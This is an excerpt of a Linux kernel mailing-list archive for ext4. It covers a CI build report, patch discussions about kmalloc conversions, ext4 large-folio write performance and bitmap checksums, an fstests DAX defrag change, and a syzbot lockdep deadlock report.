2.43.0
^ permalink raw reply related
* [tytso-ext4:dev] BUILD SUCCESS 3ca1d19c1971ac4f25478eafb741e726bf2d5954
From: kernel test robot @ 2026-06-06 2:03 UTC (permalink / raw)
To: Theodore Ts'o; +Cc: linux-ext4
tree/branch: https://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4.git dev
branch HEAD: 3ca1d19c1971ac4f25478eafb741e726bf2d5954 ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers
elapsed time: 1717m
configs tested: 180
configs skipped: 15
The following configs have been built successfully.
More configs may be tested in the coming days.
tested configs:
alpha allnoconfig gcc-15.2.0
alpha allyesconfig gcc-16.1.0
alpha defconfig gcc-16.1.0
arc allnoconfig gcc-15.2.0
arc allyesconfig gcc-15.2.0
arc defconfig gcc-16.1.0
arc randconfig-001 gcc-8.5.0
arc randconfig-001-20260605 gcc-8.5.0
arc randconfig-002 gcc-8.5.0
arc randconfig-002-20260605 gcc-9.5.0
arm allnoconfig clang-23
arm defconfig clang-23
arm randconfig-001 gcc-16.1.0
arm randconfig-001-20260605 gcc-13.4.0
arm randconfig-002 gcc-15.2.0
arm randconfig-002-20260605 gcc-8.5.0
arm randconfig-003 clang-23
arm randconfig-003-20260605 clang-23
arm randconfig-004 gcc-13.4.0
arm randconfig-004-20260605 gcc-15.2.0
arm64 allmodconfig clang-19
arm64 allnoconfig gcc-15.2.0
arm64 defconfig gcc-16.1.0
arm64 randconfig-001-20260605 gcc-9.5.0
arm64 randconfig-002-20260605 gcc-10.5.0
arm64 randconfig-003-20260605 gcc-11.5.0
arm64 randconfig-004-20260605 clang-23
csky allmodconfig gcc-15.2.0
csky allnoconfig gcc-15.2.0
csky defconfig gcc-16.1.0
csky randconfig-001-20260605 gcc-16.1.0
csky randconfig-002-20260605 gcc-9.5.0
hexagon allmodconfig clang-23
hexagon allnoconfig clang-23
hexagon defconfig clang-23
hexagon randconfig-001-20260605 clang-20
hexagon randconfig-002-20260605 clang-23
i386 allmodconfig gcc-14
i386 allnoconfig gcc-14
i386 allyesconfig gcc-14
i386 buildonly-randconfig-001 gcc-14
i386 buildonly-randconfig-001-20260605 clang-22
i386 buildonly-randconfig-002 clang-22
i386 buildonly-randconfig-002-20260605 clang-22
i386 buildonly-randconfig-003 clang-22
i386 buildonly-randconfig-003-20260605 clang-22
i386 buildonly-randconfig-004 gcc-14
i386 buildonly-randconfig-004-20260605 clang-22
i386 buildonly-randconfig-005 gcc-14
i386 buildonly-randconfig-005-20260605 gcc-12
i386 buildonly-randconfig-006 gcc-14
i386 buildonly-randconfig-006-20260605 gcc-14
i386 defconfig clang-22
i386 randconfig-001-20260605 clang-20
i386 randconfig-002-20260605 clang-20
i386 randconfig-003-20260605 gcc-14
i386 randconfig-004-20260605 gcc-14
i386 randconfig-005-20260605 clang-20
i386 randconfig-006-20260605 gcc-14
i386 randconfig-007-20260605 clang-20
i386 randconfig-011-20260605 clang-22
i386 randconfig-012-20260605 clang-22
i386 randconfig-013-20260605 clang-22
i386 randconfig-014-20260605 clang-22
i386 randconfig-015-20260605 clang-22
i386 randconfig-016-20260605 clang-22
i386 randconfig-017-20260605 clang-22
loongarch allmodconfig clang-19
loongarch allnoconfig clang-23
loongarch defconfig clang-23
loongarch randconfig-001-20260605 clang-18
loongarch randconfig-002-20260605 gcc-16.1.0
m68k allmodconfig gcc-15.2.0
m68k allnoconfig gcc-15.2.0
m68k allyesconfig gcc-16.1.0
m68k defconfig gcc-16.1.0
microblaze allnoconfig gcc-15.2.0
microblaze allyesconfig gcc-15.2.0
microblaze defconfig gcc-16.1.0
mips allmodconfig gcc-15.2.0
mips allnoconfig gcc-15.2.0
mips allyesconfig gcc-15.2.0
nios2 allmodconfig gcc-11.5.0
nios2 allnoconfig gcc-11.5.0
nios2 defconfig gcc-11.5.0
nios2 randconfig-001-20260605 gcc-8.5.0
nios2 randconfig-002-20260605 gcc-8.5.0
openrisc allmodconfig gcc-15.2.0
openrisc allnoconfig gcc-15.2.0
openrisc defconfig gcc-16.1.0
parisc allmodconfig gcc-15.2.0
parisc allnoconfig gcc-15.2.0
parisc allyesconfig gcc-15.2.0
parisc defconfig gcc-16.1.0
parisc randconfig-001-20260605 gcc-14.3.0
parisc randconfig-002-20260605 gcc-12.5.0
parisc64 defconfig gcc-16.1.0
powerpc allmodconfig gcc-15.2.0
powerpc allnoconfig gcc-15.2.0
powerpc randconfig-001-20260605 gcc-8.5.0
powerpc randconfig-002-20260605 gcc-8.5.0
powerpc64 randconfig-001-20260605 clang-23
powerpc64 randconfig-002-20260605 gcc-8.5.0
riscv allnoconfig gcc-15.2.0
riscv defconfig clang-23
riscv randconfig-001 gcc-8.5.0
riscv randconfig-001-20260605 gcc-8.5.0
riscv randconfig-002 clang-23
riscv randconfig-002-20260605 clang-23
s390 allmodconfig clang-18
s390 allnoconfig clang-23
s390 allyesconfig gcc-15.2.0
s390 defconfig clang-18
s390 randconfig-001 gcc-11.5.0
s390 randconfig-001-20260605 clang-23
s390 randconfig-002 clang-23
s390 randconfig-002-20260605 clang-23
sh allmodconfig gcc-16.1.0
sh allnoconfig gcc-15.2.0
sh allyesconfig gcc-15.2.0
sh defconfig gcc-16.1.0
sh randconfig-001 gcc-16.1.0
sh randconfig-001-20260605 gcc-16.1.0
sh randconfig-002 gcc-14.3.0
sh randconfig-002-20260605 gcc-10.5.0
sparc allnoconfig gcc-15.2.0
sparc defconfig gcc-16.1.0
sparc randconfig-001-20260605 gcc-15.2.0
sparc randconfig-002-20260605 gcc-16.1.0
sparc64 allmodconfig clang-23
sparc64 defconfig clang-23
sparc64 randconfig-001-20260605 clang-23
sparc64 randconfig-002-20260605 clang-23
um allmodconfig clang-19
um allnoconfig clang-23
um allyesconfig gcc-14
um defconfig clang-23
um i386_defconfig gcc-14
um randconfig-001-20260605 clang-19
um randconfig-002-20260605 clang-23
um x86_64_defconfig clang-23
x86_64 allmodconfig clang-22
x86_64 allnoconfig clang-20
x86_64 allyesconfig clang-22
x86_64 buildonly-randconfig-001 gcc-12
x86_64 buildonly-randconfig-001-20260605 gcc-14
x86_64 buildonly-randconfig-002 clang-20
x86_64 buildonly-randconfig-002-20260605 gcc-14
x86_64 buildonly-randconfig-003 gcc-14
x86_64 buildonly-randconfig-003-20260605 gcc-14
x86_64 buildonly-randconfig-004 gcc-14
x86_64 buildonly-randconfig-004-20260605 gcc-14
x86_64 buildonly-randconfig-005 gcc-14
x86_64 buildonly-randconfig-005-20260605 gcc-14
x86_64 buildonly-randconfig-006 clang-20
x86_64 buildonly-randconfig-006-20260605 gcc-14
x86_64 defconfig gcc-14
x86_64 randconfig-001-20260605 clang-22
x86_64 randconfig-002-20260605 clang-22
x86_64 randconfig-003-20260605 clang-22
x86_64 randconfig-004-20260605 gcc-13
x86_64 randconfig-005-20260605 clang-22
x86_64 randconfig-006-20260605 gcc-14
x86_64 randconfig-011-20260605 clang-22
x86_64 randconfig-012-20260605 gcc-14
x86_64 randconfig-013-20260605 clang-22
x86_64 randconfig-014-20260605 clang-22
x86_64 randconfig-015-20260605 gcc-14
x86_64 randconfig-016-20260605 clang-22
x86_64 randconfig-071-20260605 gcc-14
x86_64 randconfig-072-20260605 gcc-14
x86_64 randconfig-073-20260605 clang-20
x86_64 randconfig-074-20260605 gcc-14
x86_64 randconfig-075-20260605 gcc-12
x86_64 randconfig-076-20260605 gcc-14
x86_64 rhel-9.4-rust clang-22
xtensa alldefconfig gcc-16.1.0
xtensa allnoconfig gcc-15.2.0
xtensa randconfig-001-20260605 gcc-8.5.0
xtensa randconfig-002-20260605 gcc-8.5.0
--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki
^ permalink raw reply
* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-05 20:54 UTC (permalink / raw)
To: David Laight
Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>
On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
>
> ...
> > I suppose we could do it with kmalloc() with some flags which to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc(). Is there a better way?
>
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.
Please don't try to help.
^ permalink raw reply
* Re: [PATCH 00/17] replace __get_free_pages() call with kmalloc()
From: Zi Yan @ 2026-06-05 20:00 UTC (permalink / raw)
To: Mike Rapoport (Microsoft)
Cc: Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi, Ryusuke Konishi,
Viacheslav Dubeyko, Trond Myklebust, Anna Schumaker, Chuck Lever,
Jeff Layton, NeilBrown, Olga Kornievskaia, Dai Ngo, Tom Talpey,
Alexander Viro, Christian Brauner, Jan Kara, Dave Kleikamp,
Theodore Ts'o, Miklos Szeredi, Andreas Hindborg, Breno Leitao,
Kees Cook, Tigran A. Aivazian, linux-kernel, linux-fsdevel,
ocfs2-devel, linux-nilfs, linux-nfs, jfs-discussion, linux-ext4,
linux-mm
In-Reply-To: <20260523-b4-fs-v1-0-275e36a83f0e@kernel.org>
On 23 May 2026, at 13:54, Mike Rapoport (Microsoft) wrote:
> This is a (small) part of larger work of replacing page allocator calls
> with kmalloc.
Is the goal to get rid of __get_free_page(s)()?
Thanks.
>
> Also in git:
> https://git.kernel.org/pub/scm/linux/kernel/git/rppt/linux.git gfp-to-kmalloc/fs
>
> Signed-off-by: Mike Rapoport (Microsoft) <rppt@kernel.org>
> ---
> Mike Rapoport (Microsoft) (17):
> quota: allocate dquot_hash with kmalloc()
> proc: replace __get_free_page() with kmalloc()
> ocfs2/dlm: replace __get_free_page() with kmalloc()
> nilfs2: replace get_zeroed_page() with kzalloc()
> NFS: replace __get_free_page() with kmalloc() in nfs_show_devname()
> NFS: remove unused page and page2 in nfs4_replace_transport()
> NFSD: replace __get_free_page() with kmalloc() in nfsd_buffered_readdir()
> libfs: simple_transaction_get(): replace get_zeroed_page() with kzalloc()
> jfs: replace __get_free_page() with kmalloc()
> jbd2: replace __get_free_pages() with kmalloc()
> isofs: replace __get_free_page() with kmalloc()
> fuse: replace __get_free_page() with kmalloc()
> fs/select: replace __get_free_page() with kmalloc()
> fs/namespace: use __getname() to allocate mntpath buffer
> configfs: replace __get_free_pages() with kzalloc()
> binfmt_misc: replace __get_free_page() with kmalloc()
> bfs: replace get_zeroed_page() with kzalloc()
>
> fs/bfs/inode.c | 4 ++--
> fs/binfmt_misc.c | 4 ++--
> fs/configfs/file.c | 7 +++----
> fs/fuse/ioctl.c | 5 +++--
> fs/isofs/dir.c | 5 +++--
> fs/jbd2/journal.c | 7 ++-----
> fs/jfs/jfs_dtree.c | 16 ++++++++--------
> fs/libfs.c | 6 +++---
> fs/namespace.c | 4 ++--
> fs/nfs/nfs4namespace.c | 15 +--------------
> fs/nfs/super.c | 4 ++--
> fs/nfsd/vfs.c | 4 ++--
> fs/nilfs2/ioctl.c | 4 ++--
> fs/ocfs2/dlm/dlmdebug.c | 24 +++++++++---------------
> fs/ocfs2/dlm/dlmdomain.c | 8 +++++---
> fs/ocfs2/dlm/dlmmaster.c | 5 ++---
> fs/ocfs2/dlm/dlmrecovery.c | 4 ++--
> fs/proc/base.c | 16 ++++++++--------
> fs/quota/dquot.c | 11 +++++------
> fs/select.c | 4 ++--
> 20 files changed, 68 insertions(+), 89 deletions(-)
> ---
> base-commit: 5d6919055dec134de3c40167a490f33c74c12581
> change-id: 20260522-b4-fs-5e5c70f31664
>
> Best regards,
> --
> Sincerely yours,
> Mike.
Best Regards,
Yan, Zi
^ permalink raw reply
* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Matthew Wilcox @ 2026-06-05 14:24 UTC (permalink / raw)
To: Jia Zhu
Cc: Theodore Ts'o, Andreas Dilger, Alexander Viro,
Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <20260605090253.32822-1-zhujia.zj@bytedance.com>
On Fri, Jun 05, 2026 at 05:02:53PM +0800, Jia Zhu wrote:
> On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> > Is this a common case for you, or is this something you noticed by
> > inspection?
>
> This was found by our kernel release benchmark. We run libMicro as part
> of that test suite:
>
> https://github.com/rzezeski/libMicro
>
> The regression shows up in buffered write/pwrite/writev overwrite tests
> on ext4 large folios.
Makes sense. I'll assume this can correspond to a reasonable workload.
It certainly seems like something that could exist.
> > Wouldn't you get just as much benefit from this?
>
> Yes. I tested this approach, and it gives almost the same result as my
> original partial-commit helper.
Excellent! Obviously it'd be even better if we didn't have to walk the
leading buffer_heads ... but there's no way to do this with the data
structure we have.
> Agreed. The original ext4_block_write_begin() change was too aggressive.
> Seeking directly to @from also skips the prefix buffers, which makes the
> old side effects harder to prove.
>
> For v2 I plan to drop that part and keep the existing walk from the head.
> The ext4 change would only stop after @to when the folio was already
> uptodate on entry, similar to your block_commit_write() suggestion:
>
> + bool folio_uptodate = folio_test_uptodate(folio);
> +
> for (bh = head, block_start = 0;
> - bh != head || !block_start;
> + (bh != head || !block_start) &&
> + (!folio_uptodate || block_start < to);
> block++, block_start = block_end, bh = bh->b_this_page) {
> ...
> }
Yes, I think that's a good approach.
> So the prefix path and all in-range handling stay unchanged. The only
> skipped work is the tail part after @to, and only for a folio that was
> already uptodate before write_begin() started.
>
> > ... converting ext4 to use iomap instead of buffer heads.
>
> I strongly agree that iomap is the right direction for ext4. The iomap
> buffered write path would make this particular buffer-head walk cost go
> away.
>
> The reason I am still looking at this path is that the regression is
> visible in our LTS upgrade testing from 6.12 to 6.18. It was introduced
> by the ext4 large-folio enablement in v6.16. For example, in our
> libMicro release benchmark with THP always enabled, usecs/call, lower is
> better:
>
> case v6.12 v6.18 regression
> write_u1k 0.609 4.659 +665.0%
> write_u10k 1.408 4.869 +245.8%
Ouch ;-) No wonder you want to address this. Do you recover all the
regression with this fix?
> The iomap conversion is the long-term fix, but it does not help kernels
> which still use the buffer-head buffered write path. I would like to keep
> this as a small regression fix for that path, and make it minimal enough
> to be suitable for stable/LTS backport.
Is it that you're using some ext4 features that aren't supported by
iomap yet? Could you say which ones? That might motivate someone to
prioritise that support.
> Would this v2 direction look OK to you?
Absolutely. Very happy with this approach.
^ permalink raw reply
* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Uladzislau Rezki @ 2026-06-05 9:50 UTC (permalink / raw)
To: David Laight
Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>
On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
>
> ...
> > I suppose we could do it with kmalloc() with some flags which to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc(). Is there a better way?
>
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.
>
I assume you mean kvmalloc()? kvalloc() is something unknown to me.
--
Uladzislau Rezki
^ permalink raw reply
* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Jia Zhu @ 2026-06-05 9:02 UTC (permalink / raw)
To: Matthew Wilcox
Cc: Jia Zhu, Theodore Ts'o, Andreas Dilger, Alexander Viro,
Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <aiBuZE5NWMfOGAA6@casper.infradead.org>
On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> Is this a common case for you, or is this something you noticed by
> inspection?
This was found by our kernel release benchmark. We run libMicro as part
of that test suite:
https://github.com/rzezeski/libMicro
The regression shows up in buffered write/pwrite/writev overwrite tests
on ext4 large folios.
> Wouldn't you get just as much benefit from this?
Yes. I tested this approach, and it gives almost the same result as my
original partial-commit helper.
I agree this is a better direction for block_commit_write(). It keeps the
existing buffer-head state handling and only stops the tail walk after an
already-uptodate folio has been committed through @to. That removes the
main large-folio cost in our small-overwrite benchmark while keeping the
change much closer to the old code.
> I'm unconvinced that this is safe ...
Agreed. The original ext4_block_write_begin() change was too aggressive.
Seeking directly to @from also skips the prefix buffers, which makes the
old side effects harder to prove.
For v2 I plan to drop that part and keep the existing walk from the head.
The ext4 change would only stop after @to when the folio was already
uptodate on entry, similar to your block_commit_write() suggestion:
+ bool folio_uptodate = folio_test_uptodate(folio);
+
for (bh = head, block_start = 0;
- bh != head || !block_start;
+ (bh != head || !block_start) &&
+ (!folio_uptodate || block_start < to);
block++, block_start = block_end, bh = bh->b_this_page) {
...
}
So the prefix path and all in-range handling stay unchanged. The only
skipped work is the tail part after @to, and only for a folio that was
already uptodate before write_begin() started.
> ... converting ext4 to use iomap instead of buffer heads.
I strongly agree that iomap is the right direction for ext4. The iomap
buffered write path would make this particular buffer-head walk cost go
away.
The reason I am still looking at this path is that the regression is
visible in our LTS upgrade testing from 6.12 to 6.18. It was introduced
by the ext4 large-folio enablement in v6.16. For example, in our
libMicro release benchmark with THP always enabled, usecs/call, lower is
better:
case v6.12 v6.18 regression
write_u1k 0.609 4.659 +665.0%
write_u10k 1.408 4.869 +245.8%
The iomap conversion is the long-term fix, but it does not help kernels
which still use the buffer-head buffered write path. I would like to keep
this as a small regression fix for that path, and make it minimal enough
to be suitable for stable/LTS backport.
Would this v2 direction look OK to you?
^ permalink raw reply
* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: David Laight @ 2026-06-05 8:33 UTC (permalink / raw)
To: Theodore Tso
Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>
On Thu, 4 Jun 2026 10:05:52 -0400
"Theodore Tso" <tytso@mit.edu> wrote:
...
> I suppose we could do it with kmalloc() with some flags which to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc(). Is there a better way?
There is already kvalloc().
I'm not sure how hard that tries to get kmalloc() to succeed.
-- David
>
> Thanks,
>
> - Ted
>
^ permalink raw reply
* Re: [PATCH RFC 10/17] ext4: use fast incremental CRC update in ext4_free_inode()
From: Baokun Li @ 2026-06-05 7:55 UTC (permalink / raw)
To: Theodore Tso; +Cc: linux-ext4, sashiko
In-Reply-To: <h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit>
On 2026/6/3 22:17, Theodore Tso wrote:
> On Fri, May 08, 2026 at 11:33:05PM +0000, sashiko-bot@kernel.org wrote:
>> Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:
>> - [High] ext4_inode_bitmap_csum_set_fast() corrupts the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not a multiple of 8.
>>
>>> - ext4_inode_bitmap_csum_set(sb, gdp, bitmap_bh);
>>> + ext4_inode_bitmap_csum_set_fast(sb, gdp, bit);
>> Can this corrupt the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not
>> a multiple of 8?
>>
>> In ext4_inode_bitmap_csum_set(), the CRC32c checksum is computed over exactly
>> EXT4_INODES_PER_GROUP(sb) >> 3 bytes. If s_inodes_per_group is not a multiple
>> of 8, any trailing fractional bits are strictly excluded from the checksum
>> calculation.
>>
>> Because ext4_fill_super() does not enforce that s_inodes_per_group is a
>> multiple of 8, a crafted filesystem can have an unaligned s_inodes_per_group.
> The reason why ext4_fill_super() doesn't enforce that
> s_inodes_per_group is a multiple of 8 was that a long time ago, back
> when Android was allergic to GPLv2 in userspace, they implemented
> their own version of mke2fs (and didn't run fsck on the file system,
> sigh). Their MIT licensed version of make_ext4fs would occasionally
> make file systems that were not a multiple of 8, and this ran afoul of
> e2fsck[1] if someone actually tried to repair a corrupted Android user
> data file system (as opposed to just wiping the flash and starting
> from scratch).
>
> [1] https://sourceforge.net/p/e2fsprogs/bugs/292/
>
> This was fixed long ago (over a decade ago), and so at this point, I'm
> pretty sure any such mobile handsets are in the landfill, so we
> probably should fix this by adding a check in ext4_fill_super() and a
> corresponding check in e2fsck.
>
> - Ted
Hi Ted,
Thank you for your information and suggestions.
I will send two fix patches to synchronize the checks in mke2fs
with ext4_fill_super and e2fsck.
Thanks,
Baokun
^ permalink raw reply
* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Disha Goel @ 2026-06-05 7:02 UTC (permalink / raw)
To: Darrick J. Wong
Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
ojaswin
In-Reply-To: <20260604145434.GG6095@frogsfrogsfrogs>
On 04/06/26 8:24 pm, Darrick J. Wong wrote:
> On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
>> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
>> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
>> on DAX files.
>>
>> Add an ext4-specific check in _require_defrag() to skip tests when DAX
>> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
>> generic/018.
>>
>> XFS defrag works with DAX, so this check is ext4-specific.
>>
>> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
>> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
>> ---
>> Changes in v2:
>> - Made the check ext4-specific as XFS defrag works with DAX
>> (feedback from Darrick)
>> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
>> - Removed unnecessary comment as _notrun message is self-explanatory
>>
>> common/defrag | 4 ++++
>> 1 file changed, 4 insertions(+)
>>
>> diff --git a/common/defrag b/common/defrag
>> index 055d0d0e..f17271cd 100644
>> --- a/common/defrag
>> +++ b/common/defrag
>> @@ -6,6 +6,10 @@
>>
>> _require_defrag()
>> {
>> + if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then
>
> Shouldn't this be:
>
> ext4)
> __scratch_uses_fsdax && _notrun "..."
> ;;
>
> in the case statement below?
>
> --D
Yes, that makes more sense. Keeping the ext4-specific check inside the
ext4 case is cleaner and more consistent with the existing structure.
I'll send v3 with this change.
>
>> + _notrun "ext4 online defrag not supported with DAX"
>> + fi
>> +
>> case "$FSTYP" in
>> xfs)
>> # xfs_fsr does preallocates, require "falloc"
>> --
>> 2.45.1
>>
--
Regards,
Disha
^ permalink raw reply
* [syzbot] [overlayfs?] [ext4?] possible deadlock in lock_two_nondirectories (2)
From: syzbot @ 2026-06-04 21:33 UTC (permalink / raw)
To: amir73il, linux-ext4, linux-kernel, linux-unionfs, miklos,
syzkaller-bugs
Hello,
syzbot found the following issue on:
HEAD commit: ba3e43a9e601 Merge tag 'soc-fixes-7.1-2' of git://git.kern..
git tree: upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=1033aa56580000
kernel config: https://syzkaller.appspot.com/x/.config?x=bd38685893011045
dashboard link: https://syzkaller.appspot.com/bug?extid=ad6118a7584b607c67f2
compiler: Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
syz repro: https://syzkaller.appspot.com/x/repro.syz?x=17e2f3ec580000
C reproducer: https://syzkaller.appspot.com/x/repro.c?x=174c2a66580000
Downloadable assets:
disk image: https://storage.googleapis.com/syzbot-assets/8759ddf1bfa7/disk-ba3e43a9.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/e2f0e563c705/vmlinux-ba3e43a9.xz
kernel image: https://storage.googleapis.com/syzbot-assets/b40bdb37a0d7/bzImage-ba3e43a9.xz
mounted in repro: https://storage.googleapis.com/syzbot-assets/4074e1f6d9f8/mount_0.gz
fsck result: failed (log: https://syzkaller.appspot.com/x/fsck.log?x=1103db7e580000)
IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+ad6118a7584b607c67f2@syzkaller.appspotmail.com
EXT4-fs: Ignoring removed bh option
EXT4-fs (loop0): stripe (5) is not aligned with cluster size (16), stripe is disabled
EXT4-fs (loop0): mounted filesystem 00000000-0000-0000-0000-000000000000 r/w without journal. Quota mode: none.
======================================================
WARNING: possible circular locking dependency detected
syzkaller #0 Not tainted
------------------------------------------------------
syz.0.22/5968 is trying to acquire lock:
ffff88805aab44a0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}, at: inode_lock include/linux/fs.h:1029 [inline]
ffff88805aab44a0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}, at: lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
but task is already holding lock:
ffff88803ea9c480 (sb_writers#4){.+.+}-{0:0}, at: mnt_want_write_file+0x63/0x210 fs/namespace.c:537
which lock already depends on the new lock.
the existing dependency chain (in reverse order) is:
-> #1 (sb_writers#4){.+.+}-{0:0}:
percpu_down_read_internal include/linux/percpu-rwsem.h:53 [inline]
percpu_down_read_freezable include/linux/percpu-rwsem.h:83 [inline]
__sb_start_write include/linux/fs/super.h:19 [inline]
sb_start_write+0x4d/0x1c0 include/linux/fs/super.h:125
file_start_write include/linux/fs.h:2724 [inline]
vfs_iter_write+0x1f8/0x610 fs/read_write.c:982
do_backing_file_write_iter fs/backing-file.c:226 [inline]
backing_file_write_iter+0x5e7/0x950 fs/backing-file.c:274
ovl_write_iter+0x2fd/0x3d0 fs/overlayfs/file.c:370
new_sync_write fs/read_write.c:595 [inline]
vfs_write+0x629/0xba0 fs/read_write.c:688
ksys_pwrite64 fs/read_write.c:795 [inline]
__do_sys_pwrite64 fs/read_write.c:803 [inline]
__se_sys_pwrite64 fs/read_write.c:800 [inline]
__x64_sys_pwrite64+0x19c/0x230 fs/read_write.c:800
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
-> #0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}:
check_prev_add kernel/locking/lockdep.c:3165 [inline]
check_prevs_add kernel/locking/lockdep.c:3284 [inline]
validate_chain kernel/locking/lockdep.c:3908 [inline]
__lock_acquire+0x15a5/0x2cf0 kernel/locking/lockdep.c:5237
lock_acquire+0x106/0x350 kernel/locking/lockdep.c:5868
down_write+0x3a/0x50 kernel/locking/rwsem.c:1625
inode_lock include/linux/fs.h:1029 [inline]
lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
ext4_move_extents+0x20f/0x3950 fs/ext4/move_extent.c:589
__ext4_ioctl fs/ext4/ioctl.c:1657 [inline]
ext4_ioctl+0x3092/0x4b40 fs/ext4/ioctl.c:1922
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:597 [inline]
__se_sys_ioctl+0xff/0x170 fs/ioctl.c:583
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
other info that might help us debug this:
Possible unsafe locking scenario:
CPU0 CPU1
---- ----
rlock(sb_writers#4);
lock(&ovl_i_mutex_key[depth]);
lock(sb_writers#4);
lock(&ovl_i_mutex_key[depth]);
*** DEADLOCK ***
1 lock held by syz.0.22/5968:
#0: ffff88803ea9c480 (sb_writers#4){.+.+}-{0:0}, at: mnt_want_write_file+0x63/0x210 fs/namespace.c:537
stack backtrace:
CPU: 0 UID: 0 PID: 5968 Comm: syz.0.22 Not tainted syzkaller #0 PREEMPT_{RT,(full)}
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/18/2026
Call Trace:
<TASK>
dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120
print_circular_bug+0x2e1/0x300 kernel/locking/lockdep.c:2043
check_noncircular+0x12e/0x150 kernel/locking/lockdep.c:2175
check_prev_add kernel/locking/lockdep.c:3165 [inline]
check_prevs_add kernel/locking/lockdep.c:3284 [inline]
validate_chain kernel/locking/lockdep.c:3908 [inline]
__lock_acquire+0x15a5/0x2cf0 kernel/locking/lockdep.c:5237
